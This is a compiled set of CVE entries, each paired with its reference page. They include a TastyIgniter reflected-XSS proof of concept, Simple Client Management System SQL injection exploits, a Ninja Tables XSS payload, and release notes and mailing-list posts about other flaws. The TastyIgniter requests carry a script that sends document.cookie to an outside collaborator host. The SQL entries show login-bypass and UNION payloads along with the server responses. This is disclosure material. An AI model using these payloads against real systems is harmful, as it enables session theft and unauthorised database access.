A Cross-Site Scripting (XSS) vulnerability exists within the 3.2.2 version of TastyIgniter. The "items%5B0%5D%5Bpath%5D" parameter of a request made to /admin/allergens/edit/1 is vulnerable.

**CVE-2022-23378 : Reflected XSS in TastyIgniter v3.2.2 Restaurtant CMS**

Authenticated reflected XSS exists in the TastyIgniter Admin dashboard in version v3.2.2.

Mitre URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23378

**Proof of Concept (POC):****Admin Dashboard Allergens:**

**Affected URL:** `/admin/allergens/edit/1?items%5B0%5D%5Bpath%5D=%2fdoesnotexist%3cscript%3efetch('https%3a%2f%2fvgfx3ortri1x8mjfw16ngmpq2h8awz.burpcollaborator.net'%2c%7bmethod%3a%20'POST'%2cmode%3a%20'no-cors'%2cbody%3adocument.cookie%7d)%3b%3c%2fscript%3e%20`

**Source code file affected:** `./vendor/league/flysystem/src/FileNotFoundException.php`

When updating an allergen within the administrator dashboard, an option to attach an image to the allergen is available. When attached, a POST request with parameters pertaining to data about the image is submitted. The parameter `items%5B0%5D%5Bpath%5D` is vulnerable to JavaScript injection, resulting in a potential vector for Cross-Site Scripting (XSS). When including the XSS payload, the server responds with an error message containing and executing the XSS payload.

Original POST request with XSS payload:

POST /admin/allergens/edit/1 HTTP/1.1
Host: <REDACTED>
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: \*/\*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-IGNITER-REQUEST-HANDLER: formThumb::onAddAttachment
X-CSRF-TOKEN: Y----8<----C8n
X-Requested-With: XMLHttpRequest
Origin: http://<REDACTED>
Connection: close
Cookie: tastyigniter\_session=ey----8<----n0%3D; admin\_auth=ey----8<----0%3D; ti\_activeFormSaveAction=%22close%22
Cache-Control: no-transform

items%5B0%5D%5Bname%5D=image.jpeg&items%5B0%5D%5Bpath%5D=%2fdoesnotexist%3cscript%3efetch('https%3a%2f%2fvgfx3ortri1x8mjfw16ngmpq2h8awz.burpcollaborator.net'%2c%7bmethod%3a%20'POST'%2cmode%3a%20'no-cors'%2cbody%3adocument.cookie%7d)%3b%3c%2fscript%3e%20&items%5B0%5D%5Bsize%5D=192&items%5B0%5D%5BlastModified%5D=1642193919&items%5B0%5D%5Btype%5D=file&items%5B0%5D%5BpublicUrl%5D=http%3A%2F%2F<REDACTED>%2Fassets%2Fmedia%2Fuploads%2Fimage.jpeg

![01_Original_POST](https://raw.githubusercontent.com/TheGetch/CVE-2022-23378/main/01_Original_POST.png)

Server Response:

HTTP/1.1 500 Internal Server Error
Date: Fri, 14 Jan 2022 21:21:27 GMT
Server: Apache/2.4.38 (Debian)
Cache-Control: no-cache, private
Set-Cookie: tastyigniter\_session=e----8<\----In0%3D; expires\=Fri, 14-Jan-2022 23:21:27 GMT; Max-Age\=7200; path\=/; httponly; samesite\=lax
Content-Length: 183
Connection: close
Content-Type: text/html; charset=UTF-8

File not found at path: uploads/doesnotexist<script\>fetch('https:/vgfx3ortri1x8mjfw16ngmpq2h8awz.burpcollaborator.net',{method: 'POST',mode: 'no-cors',body:document.cookie});</script\>

Furthermore, the request can be changed to a GET request with the affected parameter included within the URL, further increasing the likelihood of success for an adversary to exploit on a phished victim.

Modified GET request:

GET /admin/allergens/edit/1?items%5B0%5D%5Bpath%5D=%2fdoesnotexist%3cscript%3efetch('https%3a%2f%2fvgfx3ortri1x8mjfw16ngmpq2h8awz.burpcollaborator.net'%2c%7bmethod%3a%20'POST'%2cmode%3a%20'no-cors'%2cbody%3adocument.cookie%7d)%3b%3c%2fscript%3e%20 HTTP/1.1
Host: <REDACTED>
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: \*/\*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-IGNITER-REQUEST-HANDLER: formThumb::onAddAttachment
X-CSRF-TOKEN: Y----8<----C8n
X-Requested-With: XMLHttpRequest
Origin: http://<REDACTED>
Connection: close
Cookie: tastyigniter\_session=ey----8<----n0%3D; admin\_auth=ey----8<----0%3D; ti\_activeFormSaveAction=%22close%22
Cache-Control: no-transform

![02_Modified_GET](https://raw.githubusercontent.com/TheGetch/CVE-2022-23378/main/02_Modified_GET.png)

Response remains the same:

HTTP/1.1 500 Internal Server Error
Date: Fri, 14 Jan 2022 21:21:27 GMT
Server: Apache/2.4.38 (Debian)
Cache-Control: no-cache, private
Set-Cookie: tastyigniter\_session=eyJpdiI6Ik16bUtDZUV6eEw3RzByeG1LTWNBdUE9PSIsInZhbHVlIjoiQUgrTkJ1b2tmMzlFenVDVFlZZ1FHa0d5eVVITUFvT0t0YS9vcklNaHRKMnJYQjYwUyt5S3EySVpLWkpCSzR0YkhTS283VHV4d21KRjhCeHBZQ2NXbGlVRFVBcm9jR1dZbVlsdGZEdzFGZzQwQ2VjVjN1VkZ6ZWh2NmRGZis5dFEiLCJtYWMiOiI3YWQ4ZTM0NzBkZWIyZTNmNmE2OWM3NmJkMWJkYzgwNWYzYzRkNjQ2NjY5OGU2NzhkNjY5YTRlMWNmOTFiMjY0IiwidGFnIjoiIn0%3D; expires=Fri, 14-Jan-2022 23:21:27 GMT; Max-Age=7200; path=/; httponly; samesite=lax
Content-Length: 183
Connection: close
Content-Type: text/html; charset=UTF-8

File not found at path: uploads/doesnotexist<script\>fetch('https:/vgfx3ortri1x8mjfw16ngmpq2h8awz.burpcollaborator.net',{method: 'POST',mode: 'no-cors',body:document.cookie});</script\>

![03_Server_Response](https://raw.githubusercontent.com/TheGetch/CVE-2022-23378/main/03_Server_Response.png)

**Collaborator Interaction:**

![04_Collaborator_Hit](https://raw.githubusercontent.com/TheGetch/CVE-2022-23378/main/04_Collaborator_Hit.png)

![05_Collaborator_Interaction](https://raw.githubusercontent.com/TheGetch/CVE-2022-23378/main/05_Collaborator_Interaction.png)

**Discovery**

January 2022

*   Eric Getchell - TheGetch

CVE-2022-23378: GitHub - TheGetch/CVE-2022-23378

perM 0.4.0 has a Buffer Overflow related to strncpy. (Debian initially fixed this in 0.4.0-7.)

*   _To_: debian-med@lists.debian.org
*   _Subject_: Re: Autopkgtest for perm
*   _From_: Nilesh Patra <nilesh@tchncs.de\>
*   _Date_: Mon, 2 Aug 2021 18:44:55 +0530
*   _Message-id_: <\[🔎\] 89b79cf7-8163-5986-8746-4ba065cafdca@tchncs.de\>
*   _In-reply-to_: <\[🔎\] 20210802130013.GX25911@an3as.eu\>
*   _References_: <\[🔎\] CAJFurRRrERrOccMGHRm2ghj=6fmu5AD3Nm8HXRfeYRpO4bhG5g@mail.gmail.com\> <\[🔎\] 20210802130013.GX25911@an3as.eu\>

On 8/2/21 6:30 PM, Andreas Tille wrote:
> Hi Shruti,
> 
> On Mon, Aug 02, 2021 at 04:50:36PM +0530, Shruti Sridhar wrote:
>> I have written autopkgtests for perm\[1\]
>>
>> The package initially failed blhc in the pipeline but when I fixed the
>> error \[2\]

Congratulations, you found a security issue as it seems.
I'm happy that enabling blhc is doing a sensible job

>> the autopkgtest which was initially working fails \[3\].
> 
> The autopkgtest says:
> 
> Info 3: Sortubg buckets using 2 CPUs                                          .
> \*\*\* buffer overflow detected \*\*\*: terminated
> Info 3: Successfully made the index
> 
> My guess is that enabling hardening options has uncovered some memory leak.
> I'd recommend firing up gdb and try finding the issue.

The basic problem is that it has several instances of strcpy and sprintf, which are
famously known for causing buffer overflows.

I think the sensible option is to replace these with strlcpy and strcat when needed.

But the problem is that the code needs a lot of refactoring, rewriting and debugging to get these things in properly.
So I am tempted to say that we should consider to remove perm from the archive.
Upstream is dead, and I do not think it is worth keeping this in anymore

What do you think?

Nilesh

**Attachment: OpenPGP\_signature**  
_Description:_ OpenPGP digital signature

**Reply to:**

*   debian-med@lists.debian.org
*   Nilesh Patra (on-list)
*   Nilesh Patra (off-list)

*   **Follow-Ups**:
    *   **Re: Autopkgtest for perm**
        *   _From:_ Nilesh Patra <nilesh@tchncs.de>

*   **References**:
    *   **Autopkgtest for perm**
        *   _From:_ Shruti Sridhar <shruti.sridhar99@gmail.com>
    *   **Re: Autopkgtest for perm**
        *   _From:_ Andreas Tille <andreas@an3as.eu>

*   Prev by Date: **Re: Autopkgtest for perm**
*   Next by Date: **Re: Autopkgtest for perm**
*   Previous by thread: **Re: Autopkgtest for perm**
*   Next by thread: **Re: Autopkgtest for perm**
*   Index(es):
    *   **Date**
    *   **Thread**

CVE-2021-38172: Re: Autopkgtest for perm

The config restore function of Voipmonitor GUI before v24.96 does not properly check files sent as restore archives, allowing remote attackers to execute arbitrary commands via a crafted file in the web root.

CVE-2022-24262: News - VoIPmonitor

Mastodon before 3.3.2 and 3.4.x before 3.4.6 has incorrect access control because it does not compact incoming signed JSON-LD activities. (JSON-LD signing has been supported since version 1.6.0.)

![Mastodon](https://camo.githubusercontent.com/151e1927aa71042bef4528c6e8a848b83ecda374a27297111d42f69d5a1f649d/68747470733a2f2f692e696d6775722e636f6d2f4e685a6334306c2e706e67)

> ⚠️ This release is an important security release fixing CVE-2022-24307, **a critical security issue**.
> 
> A corresponding security release is also available for the 3.4.x branch, which is the recommended release.

**Changelog****Fixed**

*   Fix `mastodon:webpush:generate_vapid_key` task requiring a functional environment (ClearlyClaire)
*   Fix spurious errors when receiving an Add activity for a private post (ClearlyClaire)

**Security**

*   Fix error-prone SQL queries (ClearlyClaire)
*   Fix not compacting incoming signed JSON-LD activities (puckipedia, ClearlyClaire) (CVE-2022-24307)
*   Fix insufficient sanitization of report comments (ClearlyClaire)
*   Fix stop condition of a Common Table Expression (ClearlyClaire)
*   Disable legacy XSS filtering (Wonderfall)

**Upgrade notes**

Because this is a backport, it is not available with `git pull`. Use `git fetch && git checkout v3.3.2`

> As always, **make sure you have backups of the database before performing any upgrades**. If you are using docker-compose, this is how a backup command might look: docker exec mastodon\_db\_1 pg\_dump -Fc -U postgres postgres > name\_of\_the\_backup.dump

**Dependencies**

External dependencies have not changed compared to v3.3.1, the compatible Ruby, PostgreSQL, Node, Elasticsearch and Redis versions are the same, that is:

*   Ruby: 2.5 to 2.7
*   PostgreSQL: 9.4 or newer
*   Elasticsearch (optional, for full-text search): 5.x, 6.x or 7.x
*   Redis: 4 or newer
*   Node:
    *   Node 10: 10.0 or newer
    *   Node 12: 12.16 or newer
    *   Node 13: 13.9 or newer
    *   Node 14: 14.5 or newer

Compared to 3.3.0, an additional system dependency is required: `shared-mime-info`, which is likely already installed on your system.  
On Debian-based systems, it can be installed using `apt install shared-mime-info`.

**Update steps**

The following instructions are for updating from 3.3.2.

If you are upgrading directly from an earlier release, please carefully read the upgrade notes for the skipped releases as well, as they often require extra steps such as database migrations.

**Non-Docker**

If you're upgrading from before 3.3.2, make sure you have `shared-mime-info` installed (`apt install shared-mime-info`).

1.  Pull the code: `git fetch && git checkout v3.3.2`
2.  Restart `mastodon-web` and `mastodon-sidekiq`:  
    `systemctl reload mastodon-web`  
    `systemctl restart mastodon-sidekiq`

**Docker**

The exact steps depend on your setup, but they are likely to match the following:

1.  Pull the code: `git fetch && git checkout v3.3.2`
2.  Pull the prebuilt images: `docker-compose pull`, or, alternatively, build them yourself: `docker-compose build --pull`
3.  Restart all Mastodon processes: `docker-compose up -d`

CVE-2022-24307: Release v3.3.2 · mastodon/mastodon

SQL Injection vulnerability exists in Sourcecodester Simple Client Management System 1.0 via the username field in login.php.

Permalink

Cannot retrieve contributors at this time

\# Exploit Title: Simple Client Management System 1.0 - SQL injection (Authentication Bypass)

\# Date: 27/01/2022

\# Exploit Author: Rahul Kalnarayan (r4hn1)

\# Vendor Homepage: https://www.sourcecodester.com/

\# Software Link: https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html

\# Version: 1.0

\# Category: Webapps

\# Tested on: Apache2+MariaDB latest version

\# Description : Simple Client Management System 1.0 suffers from SQL injection vulnerability, allowing an un-authenticated user to login admin panel.

\# CVE ID: CVE-2021-43510

Vulnerable Page: /crm/admin/

POC-Request

\-----------------------------------

POST /cms/classes/Login.php?f=login HTTP/1.1

Host: 192.168.1.76

Content-Length: 31

Accept: \*/\*

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Origin: http://192.168.1.76

Referer: http://192.168.1.76/cms/admin/login.php

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

Connection: close

username=admin'+or+'1'%3d'1'--+-&password=as

\---------------------------------------

POC-Response

HTTP/1.1 200 OK

Date: Thu, 27 Jan 2022 17:29:08 GMT

Server: Apache/2.4.38 (Debian)

Set-Cookie: PHPSESSID=1s27q3saavhi3jc8lndng66tlt; path=/; secure

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate

Pragma: no-cache

Content-Length: 20

Connection: close

Content-Type: text/html; charset=UTF-8

{"status":"success"}

CVE-2021-43510: Simple-Client-Management-System-Exploit/CVE-2021-43510 at main · r4hn1/Simple-Client-Management-System-Exploit

SQL Injection vulnerability exists in Sourcecodester Simple Client Management System 1.0 via the id parameter in view-service.php.

Permalink

Cannot retrieve contributors at this time

\# Exploit Title: Simple Client Management System 1.0 - Unauthenticated SQL injection (view\_service.php)

\# Date: 27/01/2022

\# Exploit Author: Rahul Kalnarayan (r4hn1)

\# Vendor Homepage: https://www.sourcecodester.com/

\# Software Link: https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html

\# Version: 1.0

\# Category: Webapps

\# Tested on: Apache2+MariaDB latest version

\# Description : Simple Client Management System 1.0 suffers from SQL injection vulnerability, allowing an un-authenticated user to dump databse.

Vulnerable Page: /cms/admin/maintenance/view\_service.php

POC-Request

\-----------------------------------

GET /cms/admin/maintenance/view\_service.php?id=9999%27%20union%20all%20select%20null,null,concat(database()),null,null,null,null--+ HTTP/1.1

Host: 192.168.1.76

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

Connection: close

\---------------------------------------

POC-Response

HTTP/1.1 200 OK

Date: Thu, 27 Jan 2022 17:34:55 GMT

Server: Apache/2.4.38 (Debian)

Set-Cookie: PHPSESSID=radrun69h6fsn08bd53b8spsvq; path=/; secure

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate

Pragma: no-cache

Vary: Accept-Encoding

Content-Length: 1469

Connection: close

Content-Type: text/html; charset=UTF-8

<style>

#uni\_modal .modal-footer{

display:none;

}

</style>

<div class="container-fluid" id="print\_out">

<div id='transaction-printable-details' class='position-relative'>

<div class="row">

<fieldset class="w-100">

<div class="col-12">

<dl>

<dt class="text-info">Name:</dt>

<dd class="pl-3"></dd>

<dt class="text-info">Description:</dt>

<dd class="pl-3">cms\_db</dd>

<dt class="text-info">Price:</dt>

<dd class="pl-3"></dd>

<dt class="text-info">Status:</dt>

<dd class="pl-3">

<span class="badge badge-danger rounded-pill">Inactive</span>

</dd>

</dl>

</div>

</fieldset>

</div>

</div>

</div>

<div class="form-group">

<div class="col-12">

<div class="d-flex justify-content-end align-items-center">

<button class="btn btn-dark btn-flat" type="button" id="cancel" data-dismiss="modal">Close</button>

</div>

</div>

</div>

<script>

$(function(){

$('.table td,.table th').addClass('py-1 px-2 align-middle')

})

</script>

CVE-2021-43509: Simple-Client-Management-System-Exploit/CVE-2021-43509 at main · r4hn1/Simple-Client-Management-System-Exploit

The Ninja Tables WordPress plugin before 4.1.8 does not sanitise and escape some of its table fields, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed

**WordPress Ninja Tables 4.1.7 Cross Site Scripting**

Posted Oct 25, 2021

Authored by Akash Rajendra Patil

WordPress Ninja Tables plugin version 4.1.7 suffers from a persistent cross site scripting vulnerability.

tags | exploit, xss

MD5 | `1ee321f04776c466b3590854bba610c6`

Download | Favorite | View

**WordPress Ninja Tables 4.1.7 Cross Site Scripting**

    # Exploit Title: WordPress Plugin Ninja Tables 4.1.7 - Stored Cross-Site Scripting (XSS)# Date: 25-10-2021# Exploit Author: Akash Rajendra Patil# Vendor Homepage: https://wordpress.org/plugins/ninja-tables/# Software Link: https://wpmanageninja.com/downloads/ninja-tables-pro-add-on/# Version: 4.1.7# Tested on Windows*How to reproduce vulnerability:*1. Install Latest WordPress2. Install and activate Ninja Tables <= 4.1.73. Enter JavaScript payload which is mentioned below"><img src=x onerror=confirm(docment.domain)> in the 'Coulmn Name & Add Data'and enter the data into the user input field.Then Navigate to Table Design5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality in that time JavaScript payload is executing successfully and we are getting a pop-up.

**File Tags**

*   ActiveX (932)
*   Advisory (76,655)
*   Arbitrary (14,946)
*   BBS (2,859)
*   Bypass (1,518)
*   CGI (1,009)
*   Code Execution (6,477)
*   Conference (667)
*   Cracker (797)
*   CSRF (3,247)
*   DoS (21,554)
*   Encryption (2,320)
*   Exploit (49,159)
*   File Inclusion (4,121)
*   File Upload (933)
*   Firewall (821)
*   Info Disclosure (2,531)
*   Intrusion Detection (845)
*   Java (2,745)
*   JavaScript (789)
*   Kernel (5,904)
*   Local (13,904)
*   Magazine (586)
*   Overflow (12,045)
*   Perl (1,409)
*   PHP (5,024)
*   Proof of Concept (2,273)
*   Protocol (3,233)
*   Python (1,365)
*   Remote (29,340)
*   Root (3,428)
*   Ruby (564)
*   Scanner (1,628)
*   Security Tool (7,635)
*   Shell (3,014)
*   Shellcode (1,192)
*   Sniffer (877)
*   Spoof (2,064)
*   SQL Injection (15,868)
*   TCP (2,345)
*   Trojan (666)
*   UDP (865)
*   Virus (657)
*   Vulnerability (30,162)
*   Web (8,870)
*   Whitepaper (3,701)
*   x86 (939)
*   XSS (17,211)
*   Other

**File Archives**

*   January 2022
*   December 2021
*   November 2021
*   October 2021
*   September 2021
*   August 2021
*   July 2021
*   June 2021
*   May 2021
*   April 2021
*   March 2021
*   February 2021
*   Older

**Systems**

*   AIX (423)
*   Apple (1,860)
*   BSD (368)
*   CentOS (55)
*   Cisco (1,909)
*   Debian (5,947)
*   Fedora (1,690)
*   FreeBSD (1,241)
*   Gentoo (4,150)
*   HPUX (875)
*   iOS (311)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (41,376)
*   Mac OS X (682)
*   Mandriva (3,105)
*   NetBSD (255)
*   OpenBSD (476)
*   RedHat (10,982)
*   Slackware (941)
*   Solaris (1,601)
*   SUSE (1,444)
*   Ubuntu (7,593)
*   UNIX (9,015)
*   UnixWare (182)
*   Windows (6,265)
*   Other

CVE-2021-24900: WordPress Ninja Tables 4.1.7 Cross Site Scripting ≈ Packet Storm

xterm through Patch 370, when Sixel support is enabled, allows attackers to trigger a buffer overflow in set_sixel in graphics_sixel.c via crafted text.

CVE-2022-24130: XTERM - Change Log

Signiant Manager+Agents before 15.1 allows XML External Entity (XXE) attacks.

Updated December 13, 2021

**What's New in Manager+Agents 15.1**

This version of Manager+Agents includes usability improvements, bug fixes, and software architecture improvements resulting in better performance and improved security.

In this release:

*   **New Agent Picker**: A new Agent picker has been added to Media Mover jobs, Agent reports, Agent upgrades, and Manager backups to Agents, allowing you to easily select multiple Agents at a time.
    
*   **Object Mover Jobs**: ObjectDropBox and ObjectUploader job templates now support the ability to move source data after a transfer completes.
    
*   **Job Retrying**: Object Mover jobs that fail due to lack of available system resources are now retried on the next available Agent.
    
*   **Job Creation** Object Mover and Media Mover templates now have conditional prompting to make job creation easier.
    
*   **Field Notes**: You can now add Field Notes to Agent, Boolean, and PickList prompts on custom job templates.
    
*   **REST API Improvements**: The REST API now allows you to set job labels.
    
*   **REST API Documentation**: The native REST API documentation has been updated to provide better and more complete examples.
    
*   **Agent List Improvements**: In the Agent List, you can now choose to stop monitoring unreachable Agents.
    
*   **Agent Operating System Changes**: Added support for Ubuntu 20.04 LTS Agents.
    
*   **Agent Hardware Changes**: Added support for Apple M1 CPUs on macOS Agents.
    
*   **Manager and Agent Operating System Changes**: Added support for Rocky Linux 8.4.
    
*   **Active Filename**: Jobs now display the **Active Filename** of the file currently being transferred.
    
*   **Active Filename**: Job and Agent queues in resource controls can now display an **Active Filename** column to show which file is currently being transferred.
    
*   **Job Queueing**: Job queuing management has been improved to allow you to easily reorder jobs in the job queue.
    
*   **File Metadata**: Jobs now have the option to preserve the original file creation date after being transferred to a destination.
    
*   **File Suffix**: Jobs now have the option to add a suffix to new versions of files that have been previously transferred with the same name.
    
*   **Workflow Gateway**: Workflow Gateway has been improved to allow file filtering based on the source file date.
    
*   **Health Checks**: System health checks have been improved to include more information and details.
    

**Bug Fixes**

*   Fixed issues in the Windows installer related to the progress bar, installation summary, and uninstall process.
    
*   Fixed an issue where the **Data Transferred** incorrectly displayed the **Total Data** value.
    
*   Fixed an issue where the Agent version would not update on the Agent List after upgrading the Agent.
    
*   Fixed an issue in job views and reports related to date preferences not being preserved.
    
*   Fixed an issue with Media Mover related to the **Skip Source File Not Found On Send** prompt causing jobs to fail.
    
*   Fixed an issue that did not release TCP connections from Agents using version 14.0 or earlier when using Agent monitoring.
    
*   Fixed an issue where Windows Manager backups would not check for free disk space before trying to restore the system.
    
*   Fixed an issue where the job status would not show the correct status when a Windows backup failed.
    
*   Fixed an issue that prevented Workflow Gateway from working after restoring a Windows backup.
    
*   Security improvements to prevent potential XML External Entity and Cross Domain attacks.
    
    **Note**: The security improvements are available to all supported versions of the Manager software. If you are using version 14.1 or higher, it is recommended you download and install the latest bundle to ensure your system is secure. If you are using an earlier version, contact Signiant Customer Support for assistance migrating to a newer version.
    

**Perl Upgrade**

New installations of Manager+Agents version 15.1 include Perl version 5.32.1 to improve performance and security. Existing Manager+Agents deployments upgrading to version 15.1 will remain on the same version of Perl and can be manually updated. For more information see Upgrading Perl Versions in Manager+Agents 15.1.

**Upgrade Path**

This upgrade can be installed on Manager+Agents 13.1 or higher. Previous versions must upgrade to 13.1 before upgrading to this version. Contact Signiant Customer Support for more information.

**Agent Configurations**

Upgrading Manager+Agents does not preserve additional Agent configuration files other than `sigsetup.inf`. To save your additional configuration files, back up all INF files contained within the Agent `hosts` directory.

*   Linux: `usr/signiant/dds/3rdparty/jboss/server/default/deploy/signiant.war/secure/hosts/`
    
*   Windows: `C:\Program Files\Signiant\Mobilize\3rdparty\jboss\server\default\deploy\signiant.war\secure\hosts\`
    

**End of Life Announcements**

Manager+Agents 15.1 includes changes to the supported operating systems and deployment options. For more information, contact Signiant Customer Support.

**End of Agent Support for Debian Linux 8 / Ubuntu Linux 17**

Agent software no longer supports Debian Linux 8 and Ubuntu Linux 17. To upgrade to the latest version of Manager+Agents, you must upgrade any Debian or Ubuntu Linux Agents to a supported operating system.

**End of Agent Support for Apple macOS 10.13 and earlier**

Agent software no longer supports Apple macOS 10.13 (High Sierra) or earlier. To upgrade to the latest version of Manager+Agents, you must upgrade any macOS agents to version 10.14 (Mojave) or higher.

**End of Life Reminders**

The following Manager+Agents solutions are no longer supported and may require assistance from Signiant Customer Support to upgrade to a newer version of Manager+Agents.

**Manager+Agents supported Media Shuttle portals**

Manager+Agents backed Media Shuttle deployments are no longer supported. For more information, contact Signiant Customer Support for assistance migrating your Media Shuttle deployment to the cloud native Signiant Media Shuttle, which provides additional features and functionality to Media Shuttle.

**Manager+Agents supported Media Exchange**

Media Exchange deployments are not supported by Manager+Agents 15.0 or higher. To continue using Media Exchange, remain at Manager+Agents 14.1 or earlier.

**Web Transfer API**

**Web Transfer API** is not supported by Manager+Agents 15.0 or higher. To continue using Agents as TAPI-enabled servers, remain at Manager+Agents 14.1 or earlier.

Tag

#debian